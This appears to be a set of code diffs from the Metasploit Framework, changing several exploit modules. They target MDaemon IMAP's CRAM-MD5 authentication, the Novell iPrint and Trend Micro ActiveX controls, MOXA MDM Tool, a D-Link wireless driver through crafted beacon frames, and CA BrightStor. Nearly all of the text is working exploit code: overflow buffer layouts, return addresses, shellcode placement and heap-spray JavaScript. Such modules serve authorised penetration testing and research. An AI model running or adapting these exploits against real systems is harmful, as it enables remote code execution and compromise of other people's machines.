sploit[1072, 8] = generate_seh_record(target.ret)
|
||||
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
handler(client)
|
||||
|
||||
service.close_client(client)
|
||||
|
||||
end
|
||||
end
|
|
@ -1,131 +1,83 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
|
||||
##
|
||||
|
||||
package Msf::Exploit::mdaemon_imap_cram_md5;
|
||||
use strict;
|
||||
use base 'Msf::Exploit';
|
||||
use Msf::Socket::Tcp;
|
||||
use Pex::Text;
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
my $advanced = { };
|
||||
require 'msf/core'
|
||||
|
||||
my $info = {
|
||||
'Name' => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow',
|
||||
'Version' => '$Revision: 1.2 $',
|
||||
'Authors' => [ 'anonymous' ],
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32'],
|
||||
'Priv' => 1,
|
||||
include Msf::Exploit::Remote::Imap
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
||||
},
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the CRAM-MD5
|
||||
authentication of the MDaemon IMAP service. This
|
||||
vulnerability was discovered by Muts.
|
||||
},
|
||||
'Author' => [ 'anonymous' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision: 9583 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1520'],
|
||||
[ 'OSVDB', '11838'],
|
||||
[ 'BID', '11675'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 12 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
def exploit
|
||||
connect
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a buffer overflow in the CRAM-MD5 authentication of the
|
||||
MDaemon IMAP service. This vulnerability was discovered by Muts.
|
||||
}),
|
||||
print_status("Asking for CRAM-MD5 authentication...")
|
||||
sock.put("a001 authenticate cram-md5\r\n")
|
||||
res = sock.get_once
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '11838'],
|
||||
['CVE', '2004-1520'],
|
||||
['BID', '11675'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['MDaemon IMAP 8.0.3 Windows XP SP2'],
|
||||
],
|
||||
print_status("Received CRAM-MD5 answer: #{res.chomp}")
|
||||
# Magic no return-address exploitation ninjaness!
|
||||
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
|
||||
req = Rex::Text.encode_base64(buf) + "\r\n"
|
||||
sock.put(req)
|
||||
res = sock.get_once
|
||||
|
||||
'Keys' => ['mdaemon'],
|
||||
};
|
||||
print_status("Received authentication reply: #{res.chomp}")
|
||||
print_status("Sending LOGOUT to close the thread and trigger an exception")
|
||||
sock.put("a002 LOGOUT\r\n")
|
||||
res = sock.get_once
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
return($self);
|
||||
}
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
|
||||
my $targetHost = $self->GetVar('RHOST');
|
||||
my $targetPort = $self->GetVar('RPORT');
|
||||
my $targetIndex = $self->GetVar('TARGET');
|
||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
||||
my $shellcode = $encodedPayload->Payload;
|
||||
my $target = $self->Targets->[$targetIndex];
|
||||
|
||||
if (! $self->InitNops(128)) {
|
||||
$self->PrintLine("[*] Failed to initialize the NOP module.");
|
||||
return;
|
||||
}
|
||||
|
||||
my $sock = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $targetHost,
|
||||
'PeerPort' => $targetPort,
|
||||
);
|
||||
|
||||
if($sock->IsError) {
|
||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
||||
|
||||
my $req = "a001 authenticate cram-md5\r\n";
|
||||
$sock->Send($req);
|
||||
$self->PrintLine('[*] CRAM-MD5 authentication method asked');
|
||||
|
||||
$resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp);
|
||||
|
||||
# Magic no return-address exploitation ninjaness!
|
||||
$req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff";
|
||||
$req = Pex::Text::Base64Encode($req, '') . "\r\n";
|
||||
$sock->Send($req);
|
||||
$self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent');
|
||||
|
||||
$resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got authentication reply: ' . $resp);
|
||||
|
||||
$req = "a002 LOGOUT\r\n";
|
||||
$sock->Send($req);
|
||||
$self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception');
|
||||
|
||||
$resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got LOGOUT reply: ' . $resp);
|
||||
|
||||
$self->PrintLine("[*] Overflow request sent, sleeping for one second");
|
||||
select(undef, undef, undef, 1);
|
||||
|
||||
$self->Handler($sock);
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
# milw0rm.com [2005-08-12]
|
||||
end
|
||||
|
|
|
@ -1,3 +1,14 @@
|
|||
##
|
||||
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# novelliprint_callbackurl.rb
|
||||
#
|
||||
|
@ -39,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
|
||||
When sending an overly long string to the 'call-back-url' parameter in an
|
||||
op-client-interface-version action of ienipp.ocx an attacker may be able to
|
||||
execute arbitrary code.
|
||||
When sending an overly long string to the 'call-back-url' parameter in an
|
||||
op-client-interface-version action of ienipp.ocx an attacker may be able to
|
||||
execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision: 10429 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-1527' ],
|
||||
|
@ -85,15 +96,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
ret = [target.ret].pack('V')
|
||||
ret = ret * 250
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
fillto = 500
|
||||
offset = target['Offset']
|
||||
|
||||
|
||||
# ActiveX parameters
|
||||
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
|
||||
|
||||
|
@ -109,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
|
||||
html = %Q|<html>
|
||||
html = %Q|<html>
|
||||
<script>
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
var #{j_nops} = unescape('#{nops}');
|
||||
|
@ -120,13 +131,13 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
|||
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
||||
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
||||
var #{j_memory} = new Array();
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}' id='#{ienipp}'>
|
||||
<param name='operation' value='op-client-interface-version' />
|
||||
<param name='result-type' value='url' />
|
||||
<param name='operation' value='op-client-interface-version' />
|
||||
<param name='result-type' value='url' />
|
||||
<param name='call-back-url' value='#{ret}' />
|
||||
</object>
|
||||
</html>|
|
||||
|
@ -140,4 +151,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
|||
handler(cli)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,3 +1,14 @@
|
|||
##
|
||||
# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# trendmicro_extsetowner.rb
|
||||
#
|
||||
|
@ -37,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote code execution vulnerability in Trend Micro
|
||||
Internet Security Pro 2010 ActiveX.
|
||||
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
|
||||
an attacker may be able to execute arbitrary code.
|
||||
This module exploits a remote code execution vulnerability in Trend Micro
|
||||
Internet Security Pro 2010 ActiveX.
|
||||
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision: 10538 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3189' ],
|
||||
|
@ -64,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ]
|
||||
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #??
|
||||
],
|
||||
'DisclosureDate' => 'Aug 25 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -84,13 +95,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
|
||||
fillto = 500
|
||||
|
||||
# ActiveX parameters
|
||||
clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"
|
||||
|
||||
|
@ -118,9 +129,9 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
|||
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
||||
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
||||
var #{j_memory} = new Array();
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
|
||||
</script>
|
||||
</html>|
|
||||
|
@ -133,4 +144,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
|||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,82 +1,76 @@
|
|||
##
|
||||
# $Id: moxa_mdmtool.rb 11039 2010-11-14 19:03:24Z jduck $
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
Rank = GreatRanking
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
include Msf::Exploit::Remote::Seh
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
|
||||
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'Ruben Santamarta', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4741'],
|
||||
[ 'OSVDB', '69027'],
|
||||
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
|
||||
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'Ruben Santamarta', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 11039 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '69027'],
|
||||
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
|
||||
], self.class)
|
||||
end
|
||||
def on_client_connect(client)
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
client.get_once
|
||||
|
||||
client.get_once
|
||||
sploit = rand_text_alpha_upper(18024)
|
||||
|
||||
sploit = rand_text_alpha_upper(18024)
|
||||
sploit[0, 4] = [0x29001028].pack('V')
|
||||
sploit[472, payload.encoded.length] = payload.encoded
|
||||
sploit[1072, 8] = generate_seh_record(target.ret)
|
||||
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
|
||||
|
||||
sploit[0, 4] = [0x29001028].pack('V')
|
||||
sploit[472, payload.encoded.length] = payload.encoded
|
||||
sploit[1072, 8] = generate_seh_record(target.ret)
|
||||
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
|
||||
client.put(sploit)
|
||||
|
||||
client.put(sploit)
|
||||
handler(client)
|
||||
|
||||
handler(client)
|
||||
service.close_client(client)
|
||||
|
||||
service.close_client(client)
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,202 +0,0 @@
|
|||
##
|
||||
# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
|
||||
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
|
||||
allows remote code execution in kernel mode. The stack buffer overflow is triggered
|
||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
||||
element. This exploit was tested with version 1.0.1.41 of the
|
||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
||||
all cards within range of the attack will be affected. The tested adapter used
|
||||
a MAC address in the range of 00:11:95:f2:XX:XX.
|
||||
|
||||
Vulnerable clients will need to have their card in a non-associated state
|
||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
||||
the exploit and then accessing the Windows wireless network browser and
|
||||
forcing it to refresh.
|
||||
|
||||
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
||||
database indicates that D-Link has not provided an official patch or
|
||||
solution for any of the seven flaws listed at the time of writing:
|
||||
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
||||
|
||||
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
|
||||
DWL-G132 driver (v1.21).
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', # discovery, exploit dev
|
||||
'skape', # windows kernel ninjitsu
|
||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9670 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6055'],
|
||||
['OSVDB', '30296'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
|
||||
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
# Its a beautiful day in the neighborhood...
|
||||
'Space' => 1000
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Windows XP SP2 with the latest updates
|
||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
||||
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
|
||||
{
|
||||
'Ret' => 0x8066662c, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
# Windows XP SP2 install media, no patches
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
|
||||
{
|
||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 13 2006'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
stime = Time.now.to_i
|
||||
rtime = datastore['RUNTIME'].to_i
|
||||
count = 0
|
||||
|
||||
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
|
||||
while (stime + rtime > Time.now.to_i)
|
||||
wifi.write(create_beacon)
|
||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
||||
|
||||
count += 1
|
||||
|
||||
# Exit if we get a session
|
||||
break if session_created?
|
||||
end
|
||||
|
||||
print_status("Completed sending beacons.")
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# The following research was provided by Gil Dabah of ZERT
|
||||
#
|
||||
# The long rates field bug can be triggered three different ways (at least):
|
||||
# 1) Send a single rates IE with valid rates up front and long data
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
||||
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
||||
#
|
||||
|
||||
def create_beacon
|
||||
|
||||
ssid = rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + rand_text(4)
|
||||
src = ("\x90" * 4) + "\xeb\x2b"
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
buff = rand_text(75)
|
||||
buff[0, 2] = "\xeb\x49"
|
||||
buff[71, 4] = [target.ret].pack('V')
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
src + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x00\x05" + # capability flags
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
# supported rates
|
||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
||||
|
||||
# current channel
|
||||
"\x03" + "\x01" + channel.chr +
|
||||
|
||||
# eip was his name-o
|
||||
"\x01" + buff.length.chr + buff +
|
||||
|
||||
payload.encoded
|
||||
|
||||
return frame
|
||||
end
|
||||
|
||||
end
|
|
@ -1,89 +1,84 @@
|
|||
##
|
||||
# $Id: tape_engine_8A.rb 10551 2010-10-05 12:38:46Z swtornio $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = AverageRanking
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
|
||||
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
|
||||
the buffer and execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 10551 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '68330'],
|
||||
[ 'URL', 'http://www.metasploit.com/users/mc' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 4 2010',
|
||||
'DefaultTarget' => 0))
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
|
||||
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
|
||||
the buffer and execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '68330'],
|
||||
